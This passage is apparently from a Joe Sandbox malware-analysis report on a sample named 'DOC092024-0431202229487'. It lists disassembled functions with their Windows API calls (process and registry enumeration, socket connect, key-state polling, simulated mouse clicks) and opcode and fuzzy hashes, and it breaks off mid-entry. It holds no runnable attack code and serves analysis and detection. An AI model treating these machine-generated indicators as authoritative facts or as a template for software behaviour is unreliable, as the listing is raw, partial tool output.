                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                        • String ID: %s%d
                                                        • API String ID: 1941087503-1110647743
                                                        • Opcode ID: cd7788a2b185d88c400b8a6aeade3fc9c5c973a953ee43483dee5ed95a9ea34f
                                                        • Instruction ID: 46ca67f56f0a8d5ad63bda83924a80280762c02ca40567384c43837262e92fb7
                                                        • Opcode Fuzzy Hash: cd7788a2b185d88c400b8a6aeade3fc9c5c973a953ee43483dee5ed95a9ea34f
                                                        • Instruction Fuzzy Hash: 011184B5500205ABDF217F948C89FFA377DAB44744F0080B9BE49AA186DB7C9D45CB71
                                                        APIs
                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007718E4
                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00771917
                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00771A3A
                                                        • CloseHandle.KERNEL32(?), ref: 00771AB0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                        • String ID:
                                                        • API String ID: 2364364464-0
                                                        • Opcode ID: e2604d6110c03caf4d9bb83f4d0df54e23ab238aace25a6098368cb42e42b448
                                                        • Instruction ID: b2a7357c6b7ea21264c6fad725eab68f9563ec13459449fc80ef0121c93fe147
                                                        • Opcode Fuzzy Hash: e2604d6110c03caf4d9bb83f4d0df54e23ab238aace25a6098368cb42e42b448
                                                        • Instruction Fuzzy Hash: A9817570A40214EBDF10AF68C896B9D7BF5AF48720F55C059F909AF382D7B8E9418B91
                                                        APIs
                                                          • Part of subcall function 007184A6: __swprintf.LIBCMT ref: 007184E5
                                                          • Part of subcall function 007184A6: __itow.LIBCMT ref: 00718519
                                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 007705DF
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0077066E
                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0077068C
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 007706D2
                                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 007706EC
                                                          • Part of subcall function 0072F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0075AEA5,?,?,00000000,00000008), ref: 0072F282
                                                          • Part of subcall function 0072F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0075AEA5,?,?,00000000,00000008), ref: 0072F2A6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 327935632-0
                                                        • Opcode ID: c1fbf2124ef6460075516c97d989942410f3f6b9ba28b64aa4398296569014a5
                                                        • Instruction ID: 0713c7c38a33d6c246ea9ae01dc2696d2028c52ad6cd58e681d68bec8e816ced
                                                        • Opcode Fuzzy Hash: c1fbf2124ef6460075516c97d989942410f3f6b9ba28b64aa4398296569014a5
                                                        • Instruction Fuzzy Hash: 4B515975A00205EFCF04EFA8C8949EDB7B5BF49310B14C069E959AB391DB38ED45CB91
                                                        APIs
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                          • Part of subcall function 00773AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00772AA6,?,?), ref: 00773B0E
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00772DE0
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00772E1F
                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00772E66
                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00772E92
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00772E9F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                        • String ID:
                                                        • API String ID: 3440857362-0
                                                        • Opcode ID: d01bb9b016d571a0c019a24d5f55180a693cebf8866188098eac614754395f24
                                                        • Instruction ID: 54f311fd2d3d9b1bc61b9a05439dc8d5251ec507cf289e43711c9dadc36815f8
                                                        • Opcode Fuzzy Hash: d01bb9b016d571a0c019a24d5f55180a693cebf8866188098eac614754395f24
                                                        • Instruction Fuzzy Hash: E8517D71204204EFCB14EF68C885EAAB7E8FF88354F00881EF595871A1DB78ED45CB52
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: df2c49ef33a3d2750497e9a19b7c1edc221d9dd10d075db16a0a04e01376a40c
                                                        • Instruction ID: dd96767dec5d1c49f79b6c9740cde6ea27440cf68412563fd3bad61ca55c6b15
                                                        • Opcode Fuzzy Hash: df2c49ef33a3d2750497e9a19b7c1edc221d9dd10d075db16a0a04e01376a40c
                                                        • Instruction Fuzzy Hash: 0C41E275900104ABDF22DF78CC49FA9BB79AB0D3A0F15816AF81DA72E1C7389D41D664
                                                        APIs
                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007617D4
                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007617FD
                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0076183C
                                                          • Part of subcall function 007184A6: __swprintf.LIBCMT ref: 007184E5
                                                          • Part of subcall function 007184A6: __itow.LIBCMT ref: 00718519
                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00761861
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00761869
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1389676194-0
                                                        • Opcode ID: 09a34f01965a2532b99869c3f6df89648c775f1d7c8c5018004d52dd69306f3d
                                                        • Instruction ID: dd035e048d59dba65d2c190d23060847ebcd116c64c1d1028067e48f9ae99018
                                                        • Opcode Fuzzy Hash: 09a34f01965a2532b99869c3f6df89648c775f1d7c8c5018004d52dd69306f3d
                                                        • Instruction Fuzzy Hash: 90410B35A00205DFCB11EF64C995AADBBF5FF48310B148099E806AF3A1DB39ED51DB91
                                                        APIs
                                                        • GetCursorPos.USER32(000000FF), ref: 0072B749
                                                        • ScreenToClient.USER32(00000000,000000FF), ref: 0072B766
                                                        • GetAsyncKeyState.USER32(00000001), ref: 0072B78B
                                                        • GetAsyncKeyState.USER32(00000002), ref: 0072B799
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AsyncState$ClientCursorScreen
                                                        • String ID:
                                                        • API String ID: 4210589936-0
                                                        • Opcode ID: fea2d8a8880471b81134267901c9f096e4c43baa0cb83dfe81cfb252978a74c4
                                                        • Instruction ID: 343a31a1abadd2537c7482385d4a5b3bcded19ceb967374c23b867aff7bf2184
                                                        • Opcode Fuzzy Hash: fea2d8a8880471b81134267901c9f096e4c43baa0cb83dfe81cfb252978a74c4
                                                        • Instruction Fuzzy Hash: A6418131604119FFDF159F64C888AE9BBB4FB45364F10835AF82992290C738AD50DBA1
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 0074C156
                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 0074C200
                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0074C208
                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 0074C216
                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0074C21E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleep$RectWindow
                                                        • String ID:
                                                        • API String ID: 3382505437-0
                                                        • Opcode ID: 1a221a143d714da35b8aea3e8437ade0227aec8cd2d6af980de15a65cea6ab45
                                                        • Instruction ID: afc8acab68945f9ec6596dc7d8d82e46aef71a1d99fd15c987650b5247951af9
                                                        • Opcode Fuzzy Hash: 1a221a143d714da35b8aea3e8437ade0227aec8cd2d6af980de15a65cea6ab45
                                                        • Instruction Fuzzy Hash: B431BFB250121DEBDF14CFA8DE4DA9E3BB5EB04315F108229F925AB2D1C7B89D14DB90
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 0074E9CD
                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0074E9EA
                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0074EA22
                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0074EA48
                                                        • _wcsstr.LIBCMT ref: 0074EA52
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                        • String ID:
                                                        • API String ID: 3902887630-0
                                                        • Opcode ID: e1493db955303be9cceed979a72ca5246ce842faf5e197dfc654ca84b53aa305
                                                        • Instruction ID: 69694f3a8889ccd4e761286d6a342707fdf84085e12b3809c88a8f2d76ea33c6
                                                        • Opcode Fuzzy Hash: e1493db955303be9cceed979a72ca5246ce842faf5e197dfc654ca84b53aa305
                                                        • Instruction Fuzzy Hash: 9D21F672204204BBEB259B79DC49E7F7BA8FF45760F10C03AF809CA092DB69DC4196A1
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0077DCC0
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0077DCE4
                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0077DCFC
                                                        • GetSystemMetrics.USER32(00000004), ref: 0077DD24
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,0076407D,00000000), ref: 0077DD42
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$MetricsSystem
                                                        • String ID:
                                                        • API String ID: 2294984445-0
                                                        • Opcode ID: 17953139e1dde90ac5292262e53218bf8de2ff79e016cc6f33d49b37f4b57c17
                                                        • Instruction ID: 5db4ed1b3c1b639e8723d4a46b8151403b82716b02316aba7c794b5689c0b191
                                                        • Opcode Fuzzy Hash: 17953139e1dde90ac5292262e53218bf8de2ff79e016cc6f33d49b37f4b57c17
                                                        • Instruction Fuzzy Hash: 54219C71600251AFCF309F799C48A6937B5BF453A4F118626F92AC61E0D3789C51CBA0
                                                        APIs
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0074CA86
                                                          • Part of subcall function 00717E53: _memmove.LIBCMT ref: 00717EB9
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0074CAB8
                                                        • __itow.LIBCMT ref: 0074CAD0
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0074CAF6
                                                        • __itow.LIBCMT ref: 0074CB07
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow$_memmove
                                                        • String ID:
                                                        • API String ID: 2983881199-0
                                                        • Opcode ID: 4161aca66d92aa939d5ddc07072b525081a221bc88c8d94ca5b108bc2ccdc2eb
                                                        • Instruction ID: b4b516d2f776a84cd6917e15baad46b54ad8570baf6fe8fc952174fd10fc3aaf
                                                        • Opcode Fuzzy Hash: 4161aca66d92aa939d5ddc07072b525081a221bc88c8d94ca5b108bc2ccdc2eb
                                                        • Instruction Fuzzy Hash: 8521C6B6701608BBDB22EAA88D4BFDE7BB9EF49750F004025F905E7192D7798D45C3A0
                                                        APIs
                                                          • Part of subcall function 00713B1E: _wcsncpy.LIBCMT ref: 00713B32
                                                        • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00756DBA
                                                        • GetLastError.KERNEL32 ref: 00756DC5
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00756DD9
                                                        • _wcsrchr.LIBCMT ref: 00756DFB
                                                          • Part of subcall function 00756D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00756E31
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                        • String ID:
                                                        • API String ID: 3633006590-0
                                                        • Opcode ID: 94e2a080a14a1cd92cd40eeaca1bfc2c38e5267aec11f2334d1d2e773d4ac4f2
                                                        • Instruction ID: 9c7e0139f2366e99a43a27652a7bb8265e950cd1f04908e5a0503c8a391a465a
                                                        • Opcode Fuzzy Hash: 94e2a080a14a1cd92cd40eeaca1bfc2c38e5267aec11f2334d1d2e773d4ac4f2
                                                        • Instruction Fuzzy Hash: 6421D875B0231896DF246774EC4EAEA336C9F01712FA04556E825C30D2EFA8CE899A54
                                                        APIs
                                                          • Part of subcall function 0076ACD3: inet_addr.WS2_32(00000000), ref: 0076ACF5
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00769160
                                                        • WSAGetLastError.WS2_32(00000000), ref: 0076916F
                                                        • connect.WS2_32(00000000,?,00000010), ref: 0076918B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastconnectinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 3701255441-0
                                                        • Opcode ID: f1170e2caa3e2175b148c8672d45acaeed0981c9e1688a518ab04f89b463b8c3
                                                        • Instruction ID: 62992b7d26b10875b92165c917fc1fae6751254d6a14350debcf6c2d6e4b52e7
                                                        • Opcode Fuzzy Hash: f1170e2caa3e2175b148c8672d45acaeed0981c9e1688a518ab04f89b463b8c3
                                                        • Instruction Fuzzy Hash: 84219331200215AFDB14AF68CC99B6E77ADEF49724F148459FD17AB3D2CA78EC028B51
                                                        APIs
                                                        • IsWindow.USER32(00000000), ref: 007689CE
                                                        • GetForegroundWindow.USER32 ref: 007689E5
                                                        • GetDC.USER32(00000000), ref: 00768A21
                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00768A2D
                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00768A68
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$ForegroundPixelRelease
                                                        • String ID:
                                                        • API String ID: 4156661090-0
                                                        • Opcode ID: 4493a01ed59e9f75bd23cf14f379a468db55bf8422c1f26af716065b81f90471
                                                        • Instruction ID: 3263fba4fd8700142bae1a5b5233e038f366db23ce5fffb7b6f5714edceff544
                                                        • Opcode Fuzzy Hash: 4493a01ed59e9f75bd23cf14f379a468db55bf8422c1f26af716065b81f90471
                                                        • Instruction Fuzzy Hash: BD21A175A00200EFDB10EFA5DC89AAABBF5EF48341F04C479E94A97351DA78AD41CB50
                                                        APIs
                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0072B5EB
                                                        • SelectObject.GDI32(?,00000000), ref: 0072B5FA
                                                        • BeginPath.GDI32(?), ref: 0072B611
                                                        • SelectObject.GDI32(?,00000000), ref: 0072B63B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ObjectSelect$BeginCreatePath
                                                        • String ID:
                                                        • API String ID: 3225163088-0
                                                        • Opcode ID: 7bd4fcf377c2e72935876093e62e55b50918a1a3e474ce529a08d39343a738d4
                                                        • Instruction ID: 21e45c1e5cfedc69e737e4dda6f8e58b5d2130bdc81bebd5b3557b35b5f5c446
